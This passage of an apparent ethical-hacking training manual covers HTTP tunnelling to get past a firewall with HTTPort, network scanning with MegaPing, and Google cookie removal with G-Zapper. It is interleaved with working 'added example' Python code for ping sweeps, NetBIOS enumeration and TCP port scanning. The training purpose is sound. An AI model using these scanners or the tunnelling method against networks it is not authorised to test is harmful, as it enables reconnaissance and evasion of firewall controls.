FIGURE 14.14: Windows Firewall selecting a Rule Type
Tools demonstrated in this lab are available in the Z:\ mapped network drive in the virtual machines
32. Now select All remote ports in the Protocol and Ports section, and click Next.
HTTPort doesn't really care for the proxy as such; it works perfectly with firewalls, transparent accelerators, NATs and basically anything that lets the HTTP protocol through.
FIGURE 14.15: Windows Firewall assigning Protocols and Ports
33. In the Action section, select the Block the connection option and click Next.
You need to install htthost on a PC that is generally accessible on the Internet, typically your "home" PC. This means that if you started a web server on the home PC, everyone else must be able to connect to it. There are two showstoppers for htthost on home PCs:
FIGURE 14.16: Windows Firewall setting an Action
34. In the Profile section, select all three options (the rule will apply to Domain, Private, and Public) and then click Next.
NAT/firewall issues: You need to enable an incoming port. For HTThost it will typically be 80 (http) or 443 (https), but any port can be used, IF the HTTP proxy at work supports it; some proxies are configured to allow only 80 and 443.
FIGURE 14.17: Windows Firewall Profile settings
35. Type Port 21 Blocked in the Name field, and click Finish.
The default TCP port for an FTP connection is port 21. Sometimes the local Internet Service Provider blocks this port and this will result in FTP
FIGURE 14.18: Windows Firewall assigning a name to the Port rule
36. The new rule Port 21 Blocked is created as shown in the following figure.
FIGURE 14.19: Windows Firewall new rule
37. Right-click the newly created rule and select Properties.
FIGURE 14.20: Windows Firewall new rule properties
38. Select the Protocols and Ports tab. Change the Remote port option to Specific Ports and enter the port number as 21.
39. Leave the other settings at their defaults, click Apply, and then click OK.
HTTPort then intercepts that connection and runs it through a tunnel through the proxy.
Enables you to bypass your HTTP proxy in case it blocks you from the Internet.
With HTTPort, you can use various Internet software from behind the proxy, e.g., e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC etc. The basic idea is that you set up your Internet software
40. Type ftp ftp.certifiedhacker.com in the command prompt and press Enter. The connection is blocked in Windows Server 2008 by the firewall.
FIGURE 14.21: Firewall Port 21 Blocked Properties
HTTPort does neither freeze nor hang. What you are experiencing is known as "blocking operations".
FIGURE 14.22: ftp connection is blocked
41. Now open the command prompt on the Windows Server 2012 host machine, type ftp 127.0.0.1, and press Enter.
HTTPort makes it possible to open a client side of a TCP/IP connection and provide it to any software. The keywords here are: "client" and "any software".
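The outbound rule from steps 28-39 and the checks from steps 40-41, written as PowerShell for the Windows Server 2012 host; this is an added example, not code from the lab manual. It assumes the lab's addresses (HTTHost at 10.0.0.4:80, HTTPort listening on 127.0.0.1:21) and the NetSecurity cmdlets shipped with Windows Server 2012, and it makes the defender's point of the lab visible: the rule blocks remote port 21, but what actually leaves the host is an ordinary TCP session to port 80.

```powershell
# Added example (not part of the CEH lab manual).
# Constructed lab values: HTTHost machine (Windows Server 2008 VM) and its port.
$HttHost     = '10.0.0.4'
$HttHostPort = 80

# Steps 30-39: one outbound rule that blocks every TCP connection to remote port 21
# on all three profiles, named exactly as in the lab.
New-NetFirewallRule -DisplayName 'Port 21 Blocked' -Direction Outbound `
    -Protocol TCP -RemotePort 21 -Action Block `
    -Profile Domain,Private,Public -Enabled True | Out-Null

# Confirm the port filter attached to the rule is what the wizard would have produced.
Get-NetFirewallRule -DisplayName 'Port 21 Blocked' |
    Get-NetFirewallPortFilter |
    Format-Table Protocol, LocalPort, RemotePort -AutoSize

# Step 40: a direct FTP connection to the remote host now fails at the firewall.
$direct = Test-NetConnection -ComputerName 'ftp.certifiedhacker.com' -Port 21 -WarningAction SilentlyContinue
"Direct ftp.certifiedhacker.com:21 reachable: $($direct.TcpTestSucceeded)"

# Step 41: the local listener that HTTPort opened for the mapping is still reachable;
# the lab records this connection as succeeding.
$tunnelled = Test-NetConnection -ComputerName '127.0.0.1' -Port 21 -WarningAction SilentlyContinue
"Local HTTPort listener 127.0.0.1:21 reachable: $($tunnelled.TcpTestSucceeded)"

# What the host is really sending out while the tunnel is in use: a TCP session to
# the HTTHost on port 80. An egress policy or proxy log has to look at this session
# (destination, request pattern, volume) to notice the tunnel; port 21 never appears.
Get-NetTCPConnection -RemoteAddress $HttHost -RemotePort $HttHostPort -State Established |
    Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess |
    Format-Table -AutoSize
```

Run it from an elevated PowerShell session while HTTHost and HTTPort are configured as in steps 4-25; the last command lists the tunnel's real egress connection and the process ID that owns it.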
FIGURE 14.23: Executing the ftp command
Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: HTTPort
Information Collected/Objectives Achieved:
■ Proxy server used: 10.0.0.4
■ Port scanned: 80
■ Result: ftp 127.0.0.1 connected to 127.0.0.1
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. How do you set up HTTPort to use an email client (Outlook, Messenger, etc.)?
2. Examine whether the software does not allow editing the address to connect to.
Internet Connection Required
☑ Yes ☐ No
Platform Supported
☑ Classroom ☐ iLabs
Basic Network Troubleshooting Using MegaPing
MegaPing is an ultimate toolkit that provides complete essential utilities for information system administrators and IT solution providers.
Lab Scenario
You have learned in the previous lab that HTTP tunneling is a technique where communications within network protocols are captured using the HTTP protocol. For any companies to exist on the Internet, they require a web server. These web servers prove to be a high data value target for attackers. The attacker usually exploits the WWW server running IIS and gains command line access to the system. Once a connection has been established, the attacker uploads a precompiled version of the HTTP tunnel server (hts). With the hts server set up, the attacker then starts a client on his or her system and directs its traffic to the SRC port of the system running the hts server. This hts process listens on port 80 of the host WWW and redirects traffic. The hts process captures the traffic in HTTP headers and forwards it to the WWW server port 80, after which the attacker tries to log in to the system; once access is gained he or she sets up additional tools to further exploit the network.
MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports. In this lab you will learn to use MegaPing to check for vulnerabilities and troubleshoot issues.
Lab Objectives
This lab gives an insight into pinging a destination address list. It teaches how to:
■ Ping a destination address list
■ Traceroute
■ Perform NetBIOS scanning
Lab Environment
To carry out the lab, you need:
■ MegaPing, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\MegaPing
■ You can also download the latest version of MegaPing from the link http://www.magnetosoft.com/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ Administrative privileges to run tools
■ TCP/IP settings correctly configured and an accessible DNS server
■ This lab will work in the CEH lab environment, on Windows Server 2012, Windows 2008, and Windows 7
Lab Duration
Time: 10 Minutes
PING stands for Packet Internet Groper.
Overview of Ping
The ping command sends Internet Control Message Protocol (ICMP) echo request packets to the target host and waits for an ICMP response. During this request-response process, ping measures the time from transmission to reception, known as the round-trip time, and records any lost packets.
Lab Tasks

TASK 1: IP Scanning

1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 13.1: Windows Server 2012 - Desktop view

2. Click the MegaPing app to open the MegaPing window.
FIGURE 15.2: Windows Server 2012 - Apps
3. The MegaPing main window appears as shown in the following figure. The left pane lists the available tools: DNS List Hosts, DNS Lookup Name, Finger, Network Time, Ping, Traceroute, Whois, Network Resources, Process Info, System Info, IP Scanner, NetBIOS Scanner, Share Scanner, Security Scanner, Port Scanner, and Host Monitor.

FIGURE 15.3: MegaPing main window
4. Select any one of the options from the left pane of the window.

5. Select IP Scanner, and type the IP range in the From and To fields; in this lab the IP range is from 10.0.0.1 to 10.0.0.254. Click Start.

6. You can select the IP range depending on your network.
All scanners can scan individual computers, any range of IP addresses, domains, and selected types of computers inside domains.

Security Scanner provides the following information: NetBIOS names, configuration info, open TCP and UDP ports, transports, shares, users, groups, services, drivers, local drives, sessions, remote time of date, and printers.
FIGURE 15.4: MegaPing IP Scanning (IP Scanner selected, range 10.0.0.1 to 10.0.0.254)
7. It will list all the IP addresses in that range with their TTL (Time to Live), Status (dead or alive), and the statistics of the dead and alive hosts.
FIGURE 15.5: MegaPing IP Scanning Report. In the lab run, 254 hosts were probed: 4 were active (10.0.0.1 with TTL 54, and 10.0.0.4, 10.0.0.6 and 10.0.0.7 with TTL 128) and 250 failed (listed as Dest...).
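The ICMP exchange described in the Overview of Ping, together with the TTL and Alive/Dead columns of the report above, as an added example (not code from the lab manual or from MegaPing). It builds the echo request, parses and checksum-validates the reply, infers the sender's initial TTL and hop distance from the observed TTL, and tallies a sweep the way the report does. The identifier 0x1234, the payload text and the canned replies in the demo are assumptions; a real probe (raw_probe) needs administrator rights for the raw socket.

```python
"""ICMP echo request/reply handling, the mechanism behind MegaPing's Ping
and IP Scanner tools.

Added example (not code from the CEH lab manual or from MegaPing). A real
probe needs a raw socket, which is why packet building and parsing are
kept separate from the network: they run on constructed bytes here. The
identifier 0x1234 and the "MegaPing" payload are arbitrary choices; the
TTL values 54 and 128 are the ones the lab's IP scan report showed.
"""
import socket
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words, complemented.
    Summing a message that already carries its checksum yields 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Type, code 0, checksum, identifier, sequence number, payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def build_echo_request(ident: int, seq: int, payload: bytes = b"MegaPing") -> bytes:
    return build_icmp(ICMP_ECHO_REQUEST, ident, seq, payload)


def build_echo_reply(ident: int, seq: int, payload: bytes = b"MegaPing") -> bytes:
    """What the target sends back (used here to construct sample replies)."""
    return build_icmp(ICMP_ECHO_REPLY, ident, seq, payload)


def parse_icmp(packet: bytes) -> dict:
    """Parse an ICMP message (IP header already removed); rejects bad checksums."""
    if len(packet) < 8 or inet_checksum(packet) != 0:
        raise ValueError("truncated ICMP message or bad checksum")
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": packet[8:], "is_echo_reply": icmp_type == ICMP_ECHO_REPLY}


def infer_hops(observed_ttl: int) -> tuple:
    """Guess the replying stack's initial TTL (64: Linux/BSD, 128: Windows,
    255: many routers) and the hop distance. TTL 54 means a 64-TTL sender
    ten hops away; the lab's Windows hosts answered with 128, so zero hops."""
    for initial in (64, 128, 255):
        if observed_ttl <= initial:
            return initial, initial - observed_ttl
    raise ValueError("TTL must be 0..255")


def raw_probe(addr: str, ident: int = 0x1234, seq: int = 1, timeout: float = 1.0):
    """Send one echo request and return the reply's ICMP bytes (None on
    timeout). Needs administrator/root for the raw socket."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
        s.settimeout(timeout)
        s.sendto(build_echo_request(ident, seq), (addr, 0))
        try:
            data, _ = s.recvfrom(1500)
        except socket.timeout:
            return None
    ihl = (data[0] & 0x0F) * 4   # strip the IPv4 header in front of the ICMP message
    return data[ihl:]


def sweep(addresses, probe=raw_probe) -> dict:
    """Ping each address and tally Total/Active/Failed the way MegaPing's
    IP Scanner report does. `probe` returns reply bytes or None."""
    hosts = {}
    for addr in addresses:
        reply = probe(addr)
        alive = reply is not None and parse_icmp(reply)["is_echo_reply"]
        hosts[addr] = "Alive" if alive else "Dead"
    active = sum(1 for status in hosts.values() if status == "Alive")
    return {"hosts": hosts, "total": len(hosts), "active": active,
            "failed": len(hosts) - active}


if __name__ == "__main__":
    # Offline demo with constructed replies: only 10.0.0.1 and 10.0.0.4 answer.
    canned = {"10.0.0.1": build_echo_reply(0x1234, 1), "10.0.0.4": build_echo_reply(0x1234, 2)}
    print(sweep(["10.0.0.1", "10.0.0.2", "10.0.0.4"], probe=canned.get))
    print(infer_hops(54), infer_hops(128))
```

Replacing the canned probe with raw_probe turns the demo into the same sweep MegaPing runs; hosts that block ICMP will show as Dead even when they are up, which is the caveat from the ping overview.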
TASK 2: NetBIOS Scanning

8. Select the NetBIOS Scanner from the left pane and type the IP range in the From and To fields. In this lab, the IP range is from 10.0.0.1 to 10.0.0.254. Click Start.

Network utilities: DNS list host, DNS lookup name, Network Time Synchronizer, Ping, Traceroute, Whois, and Finger.
FIGURE 15.6: MegaPing NetBIOS Scanning
9. The NetBIOS scan will list all the hosts with their NetBIOS names and adapter addresses.
FIGURE 15.7: MegaPing NetBIOS Scanning Report. In the lab run, 131 hosts were queried and 3 answered: 10.0.0.4 (WIN-ULY838KHQ..), 10.0.0.6 (ADMIN-PC) and 10.0.0.7 (WIN-D39MRSHL..), each shown with its NetBIOS names, adapter address (MAC) and domain WORKGROUP.
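The NetBIOS name query behind the scan in step 9, as an added example (not code from the lab manual or from MegaPing): it encodes the wildcard name, sends a node-status request to UDP/137, and parses the reply into NetBIOS names, suffixes, group flags and the adapter address. The sample reply is constructed to resemble the lab's result for 10.0.0.6 (ADMIN-PC in WORKGROUP); its adapter address 00:15:5D:00:07:01 is assumed, since the screenshot shows only the first five octets.

```python
"""A NetBIOS Name Service node-status (NBSTAT) query over UDP/137 and the
parsing of its reply, which is how a NetBIOS scanner obtains a host's
NetBIOS names and adapter (MAC) address.

Added example (not code from the CEH lab manual or from MegaPing). The
wire format follows RFC 1001/1002. The sample reply is constructed: host
ADMIN-PC in workgroup WORKGROUP, modelled on the lab's result for
10.0.0.6, with an assumed adapter address 00:15:5D:00:07:01.
"""
import socket
import struct

NBNS_PORT = 137
QTYPE_NBSTAT = 0x0021
QCLASS_IN = 0x0001
SUFFIX_MEANING = {0x00: "Workstation/Domain", 0x03: "Messenger",
                  0x1B: "Domain Master Browser", 0x1C: "Domain Controllers",
                  0x1D: "Master Browser", 0x1E: "Browser Elections", 0x20: "File Server"}


def encode_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding: the 16-byte name is split into nibbles and each
    nibble is written as 'A'+nibble, giving 32 chars; prefixed by its length
    and terminated by a zero byte. The wildcard '*' is '*' plus 15 NULs."""
    if name == "*":
        raw = b"*" + b"\x00" * 15
    else:
        raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    encoded = bytearray()
    for byte in raw:
        encoded.append(0x41 + (byte >> 4))
        encoded.append(0x41 + (byte & 0x0F))
    return bytes([len(encoded)]) + bytes(encoded) + b"\x00"


def build_node_status_request(txid: int = 0x1234) -> bytes:
    """Header: id, flags 0 (standard query), QDCOUNT 1; question: '*' NBSTAT IN."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("*") + struct.pack("!HH", QTYPE_NBSTAT, QCLASS_IN)


def build_node_status_response(txid: int, entries, mac: bytes) -> bytes:
    """Construct a reply the way a Windows host answers (sample data only).
    entries: list of (name, suffix, is_group)."""
    rdata = bytes([len(entries)])
    for name, suffix, is_group in entries:
        flags = 0x0400 | (0x8000 if is_group else 0)   # ACT bit, plus G bit for groups
        rdata += name.upper().ljust(15).encode("ascii") + bytes([suffix]) + struct.pack("!H", flags)
    rdata += mac + b"\x00" * 40                         # unit ID (MAC), then statistics
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    rr = encode_name("*") + struct.pack("!HHIH", QTYPE_NBSTAT, QCLASS_IN, 0, len(rdata))
    return header + rr + rdata


def parse_node_status_response(data: bytes) -> dict:
    """Walk header, answer name, RR fixed fields, then the name table and MAC."""
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a NBNS response carrying an answer")
    pos = 12
    pos += 1 + data[pos] + 1                    # length byte, encoded name, terminator
    rtype, _rclass, _ttl, _rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
    pos += 10
    if rtype != QTYPE_NBSTAT:
        raise ValueError("unexpected RR type %#x" % rtype)
    num_names, pos = data[pos], pos + 1
    names = []
    for _ in range(num_names):
        raw, suffix = data[pos:pos + 15], data[pos + 15]
        nflags = struct.unpack("!H", data[pos + 16:pos + 18])[0]
        names.append({"name": raw.decode("ascii", "replace").rstrip(), "suffix": suffix,
                      "group": bool(nflags & 0x8000),
                      "meaning": SUFFIX_MEANING.get(suffix, "other")})
        pos += 18
    mac = data[pos:pos + 6]
    return {"txid": txid, "names": names,
            "adapter_address": "-".join("%02X" % b for b in mac)}


def scan_host(ip: str, timeout: float = 1.0):
    """Live query against one host (UDP/137, no privileges needed); None on timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(), (ip, NBNS_PORT))
        try:
            data, _ = s.recvfrom(2048)
        except socket.timeout:
            return None
    return parse_node_status_response(data)


# Constructed sample reply, standing in for what 10.0.0.6 returned in the lab.
SAMPLE_REPLY = build_node_status_response(
    0x1234,
    [("ADMIN-PC", 0x00, False), ("WORKGROUP", 0x00, True), ("ADMIN-PC", 0x20, False)],
    bytes.fromhex("00155D000701"))

if __name__ == "__main__":
    print(parse_node_status_response(SAMPLE_REPLY))
```

scan_host('10.0.0.6') performs the live query and, unlike the ICMP probe, needs no special privileges. Hosts with the Windows firewall enabled do not answer UDP/137, so a missing reply does not mean the host is down; the 131 queried versus 3 answering in the lab report illustrates exactly that.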
TASK 3: Traceroute

10. Right-click the IP address. In this lab, the selected IP is 10.0.0.4; it will be different in your network.

11. Select the Traceroute option from the context menu.

MegaPing can scan your entire network and provide information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, and more.

Scan results can be saved in HTML or TXT reports, which can be used to secure your network, for example, by shutting down unnecessary ports, closing shares, etc.
FIGURE 15.8: MegaPing Traceroute. The context menu on a NetBIOS scan result offers Export To File, Merge Hosts, Open Share, View Hotfix Details, Apply Hot Fixes, Copy selected item, Copy selected row, Copy all results, Save As, and Traceroute.
12. It will open the Traceroute window and trace the selected IP address.
FIGURE 15.9: MegaPing Traceroute Report. The traces to 10.0.0.4 (WIN-ULY838KHQ..) and 10.0.0.6 (ADMIN-PC) each completed in one hop, as expected for hosts on the same LAN segment.
TASK 4: Port Scanning

13. Select Port Scanner from the left pane and add www.certifiedhacker.com in the Destination Address List, and then click the Start button.

14. After clicking the Start button it toggles to Stop.

15. It will list the ports associated with www.certifiedhacker.com with the keyword, risk, and port number.

Other features include a multithreaded design that allows processing any number of requests in any tool at the same time, real-time network connection status and protocol statistics, real-time process information and usage, real-time network information including network connections and open network files, system tray support, and more.
FIGURE 15.10: MegaPing Port Scanning Report. Protocol TCP and UDP; each row gives the port, type, keyword (service name), description and risk. The lab run (51% complete) shows TCP ftp (File Transfer [Control]) and TCP www-http (World Wide Web HTTP) rated Elevated, UDP tcpmux (TCP Port Service Multiplexer) rated Elevated, and UDP compressnet (Management Utility / Compression Process), rje (Remote Job Entry), echo and discard rated Low.
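A TCP connect scan that produces the port/keyword/risk rows of Task 4, as an added example (not code from the lab manual or from MegaPing). The keyword and description strings follow the IANA service-name registry, which is where MegaPing's Keyword column comes from; the Elevated/Low rating is the example's own assumed rule, since the lab does not say how MegaPing grades risk. To run offline, demo() scans 127.0.0.1 against a listener it opens itself; scan('www.certifiedhacker.com', range(1, 1025)) reproduces the lab's target.

```python
"""A TCP connect scan producing the port / type / keyword / description /
risk rows that MegaPing's Port Scanner reports.

Added example (not code from the CEH lab manual or from MegaPing). The
keyword and description strings are taken from the IANA service-name
registry; the "Elevated" vers "Low" rating is this example's own assumed
rule (remotely administrable or cleartext services rated Elevated).
The demo target is a listener the code opens on 127.0.0.1 itself.
"""
import socket
from concurrent.futures import ThreadPoolExecutor

SERVICES = {
    21: ("ftp", "File Transfer [Control]"),
    22: ("ssh", "The Secure Shell (SSH) Protocol"),
    23: ("telnet", "Telnet"),
    25: ("smtp", "Simple Mail Transfer"),
    53: ("domain", "Domain Name Server"),
    80: ("www-http", "World Wide Web HTTP"),
    110: ("pop3", "Post Office Protocol - Version 3"),
    135: ("epmap", "DCE endpoint resolution"),
    139: ("netbios-ssn", "NETBIOS Session Service"),
    443: ("https", "http protocol over TLS/SSL"),
    445: ("microsoft-ds", "Microsoft-DS"),
    3389: ("ms-wbt-server", "MS WBT Server"),
}
ELEVATED = {21, 23, 25, 110, 135, 139, 445, 3389}   # assumed rating for the example


def risk(port: int) -> str:
    return "Elevated" if port in ELEVATED else "Low"


def connect_scan_port(host: str, port: int, timeout: float = 0.5) -> bool:
    """Full three-way handshake: open if connect() succeeds. Closed ports
    answer RST (connect fails fast); filtered ports time out."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def scan(host: str, ports, timeout: float = 0.5, workers: int = 32) -> list:
    """Scan ports concurrently and return the rows for open ones, sorted by port."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: (p, connect_scan_port(host, p, timeout)), ports))
    rows = []
    for port, is_open in states:
        if is_open:
            keyword, description = SERVICES.get(port, ("unknown", ""))
            rows.append({"port": port, "type": "TCP", "keyword": keyword,
                         "description": description, "risk": risk(port)})
    return sorted(rows, key=lambda r: r["port"])


def demo():
    """Offline run: one listening port (open) and one freshly released port (closed).
    Returns (rows, open_port, closed_port)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                                   # nothing listens here any more
    try:
        rows = scan("127.0.0.1", [open_port, closed_port], timeout=1.0)
    finally:
        listener.close()
    return rows, open_port, closed_port


if __name__ == "__main__":
    for row in demo()[0]:
        print(row)
```

A connect scan completes the full handshake, so the target's service logs record every probe; a SYN scan avoids that but needs raw sockets. MegaPing's UDP scan is not shown because UDP has no handshake, and telling closed from filtered relies on ICMP port-unreachable messages that firewalls commonly suppress.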
Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.

Tool/Utility: MegaPing

Information Collected/Objectives Achieved:

IP Scan Range: 10.0.0.1 - 10.0.0.254

Performed Actions:
■ IP Scanning
■ NetBIOS Scanning
■ Traceroute
■ Port Scanning

Result:
■ List of Active Hosts
■ NetBIOS Names
■ Adapter Addresses

MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves the information in security reports.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. How does MegaPing detect security vulnerabilities on the network?

2. Examine the report generation of MegaPing.

Internet Connection Required

□ Yes ☑ No

Platform Supported

☑ iLabs ☑ Classroom
Lab

Detect, Delete and Block Google Cookies Using G-Zapper

G-Zapper is a utility to block Google cookies, clean Google cookies, and help you stay anonymous while searching online.
Lab Scenario

You have learned in the previous lab that the MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves the information in security reports. It provides detailed information about all computers and network appliances. It scans your entire network and provides information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, etc. Scan results can be saved in HTML or TXT reports, which can be used to secure your network.

As an administrator, you can organize safety measures by shutting down unnecessary ports, closing shares, etc. to block attackers from intruding into the network. As another aspect of prevention you can use G-Zapper, which blocks Google cookies, cleans Google cookies, and helps you stay anonymous while searching online. This way you can protect your identity and search history.
Lab Objectives

This lab explains how G-Zapper automatically detects and cleans the Google cookie each time you use your web browser.

Lab Environment

To carry out the lab, you need:
■ G-Zapper, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Anonymizers\G-Zapper
■ You can also download the latest version of G-Zapper from http://www.dummysoftware.com/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ Install G-Zapper in Windows Server 2012 by following the wizard-driven installation steps
■ Administrative privileges to run tools
■ A computer running Windows Server 2012

Lab Duration

Time: 10 Minutes
Overview of G-Zapper

G-Zapper helps protect your identity and search history. G-Zapper will read the Google cookie installed on your PC, display the date it was installed, determine how long your searches have been tracked, and display your Google searches. G-Zapper allows you to automatically delete or entirely block the Google search cookie from future installation.
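What "read the Google cookie, display the date it was installed, determine how long your searches have been tracked" and "delete" amount to on a Firefox profile, as an added example (not code from the lab manual or from G-Zapper). It runs against a temporary cookies.sqlite created with a reduced subset of Firefox's moz_cookies columns and constructed cookies: a PREF cookie carrying the ID the lab screenshot shows (6b4b4d9fe5c60cc1), an NID cookie, and an unrelated example.org cookie that must survive. The cookie names are an assumption; the host filter does the work. The same functions accept a real profile path, such as the one the lab's dialog shows, with Firefox closed (it locks the file).

```python
r"""Detecting, logging and deleting the Google search cookie in a Firefox
cookies.sqlite store, the work G-Zapper automates.

Added example (not code from the CEH lab manual or from G-Zapper). The
database is created here with a reduced subset of Firefox's moz_cookies
columns (creationTime is microseconds since the epoch) and constructed
cookies. A real profile path such as the lab's
C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite
is passed to the same functions.
"""
import datetime as dt
import os
import sqlite3
import tempfile

GOOGLE_FILTER = "host = 'google.com' OR host LIKE '%.google.com'"
US = 10 ** 6   # microseconds per second


def google_cookies(db_path: str) -> list:
    """Cookies scoped to google.com, oldest first, with creation time (UTC)."""
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute("SELECT name, value, host, creationTime FROM moz_cookies "
                           "WHERE " + GOOGLE_FILTER + " ORDER BY creationTime").fetchall()
    finally:
        con.close()
    return [{"name": n, "value": v, "host": h,
             "created": dt.datetime.fromtimestamp(c / US, dt.timezone.utc)}
            for n, v, h, c in rows]


def tracked_hours(cookies: list, now: dt.datetime) -> int:
    """How long searches have been linkable: the age of the oldest Google cookie."""
    if not cookies:
        return 0
    return int((now - cookies[0]["created"]).total_seconds() // 3600)


def delete_google_cookies(db_path: str, log_path: str, browser: str = "Firefox") -> int:
    """Remove the cookies and append a cleaned-cookies log line in G-Zapper's format."""
    con = sqlite3.connect(db_path)
    try:
        deleted = con.execute("DELETE FROM moz_cookies WHERE " + GOOGLE_FILTER).rowcount
        con.commit()
    finally:
        con.close()
    if deleted:
        stamp = dt.datetime.now().strftime("%A, %B %d, %Y %I:%M:%S %p")
        with open(log_path, "a", encoding="utf-8") as log:
            log.write("(%s) %s %s\n" % (browser, db_path, stamp))
    return deleted


def make_sample_db(path: str, now_us: int) -> None:
    """Constructed cookie store: two Google cookies (13 h and 2 h old) and one bystander."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, name TEXT, value TEXT, "
                "host TEXT, path TEXT, expiry INTEGER, creationTime INTEGER)")
    con.executemany(
        "INSERT INTO moz_cookies (name, value, host, path, expiry, creationTime) "
        "VALUES (?, ?, ?, ?, ?, ?)", [
            ("PREF", "ID=6b4b4d9fe5c60cc1:constructed", ".google.com", "/",
             now_us // US + 63072000, now_us - 13 * 3600 * US),
            ("NID", "62=constructed", ".google.com", "/",
             now_us // US + 15552000, now_us - 2 * 3600 * US),
            ("session", "abc123", "example.org", "/",
             now_us // US + 3600, now_us - 3600 * US),
        ])
    con.commit()
    con.close()


def demo() -> dict:
    """Detect, report, delete and verify on a temporary store."""
    workdir = tempfile.mkdtemp()
    db_path = os.path.join(workdir, "cookies.sqlite")
    log_path = os.path.join(workdir, "cookiescleaned.txt")
    now = dt.datetime(2012, 9, 5, 14, 52, 38, tzinfo=dt.timezone.utc)   # time of the lab's last log entry
    now_us = int(now.timestamp()) * US
    make_sample_db(db_path, now_us)
    found = google_cookies(db_path)
    report = {"found": [c["name"] for c in found], "tracked_hours": tracked_hours(found, now)}
    report["deleted"] = delete_google_cookies(db_path, log_path)
    report["remaining_google"] = len(google_cookies(db_path))
    con = sqlite3.connect(db_path)
    report["remaining_total"] = con.execute("SELECT COUNT(*) FROM moz_cookies").fetchone()[0]
    con.close()
    with open(log_path, encoding="utf-8") as log:
        report["log_lines"] = log.read().splitlines()
    return report


if __name__ == "__main__":
    print(demo())
```

Chrome keeps its cookies in a differently named table (cookies, keyed by host_key), so only the query text changes for the Chrome path the lab's log shows. Deleting every google.com cookie also ends Gmail and other Google sessions, which is the same side effect the tool warns about when blocking.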
Lab Tasks

TASK 1: Detect & Delete Google Cookies

1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 16.1: Windows Server 2012 - Desktop view

2. Click the G-Zapper app to open the G-Zapper window.
FIGURE 16.2: Windows Server 2012 - Apps
3. The G-Zapper main window will appear as shown in the following screenshot.
FIGURE 16.3: G-Zapper main window. The trial version's window reads: "Did you know - Google stores a unique identifier in a cookie on your PC, which allows them to track the keywords you search for. G-Zapper will automatically detect and clean this cookie in your web browser. Just run G-Zapper, minimize the window, and enjoy your enhanced search privacy." In the lab it reported: A Google Tracking ID exists on your PC; Your Google ID (Chrome) 6b4b4d9fe5c60cc1; Google installed the cookie on Wednesday, September 05, 2012 01:54:46 AM; Your searches have been tracked for 13 hours; No Google searches found in Internet Explorer or Firefox. Buttons: Delete Cookie, Restore Cookie, Test Google, Settings, Register.
4. To delete the Google search cookies, click the Delete Cookie button; a window will appear that gives information about the deleted cookie location. Click OK.
G-Zapper is compatible with Windows 95, 98, ME, NT, 2000, XP, Vista, and Windows 7.
FIGURE 16.4: Deleting search cookies. The confirmation dialog reads: "The Google search cookie was removed and will be re-created with a new ID upon visiting www.google.com. The cookie was located at (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite". The main window now offers Block Cookie: to block and delete the Google search cookie, click the Block Cookie button (Gmail and AdSense will be unavailable with the cookie blocked).

A new cookie will be generated upon your next visit to Google, breaking the chain that relates your searches.
5. To block the Google search cookie, click the Block Cookie button. A window will appear asking if you want to manually block the Google cookie. Click Yes.
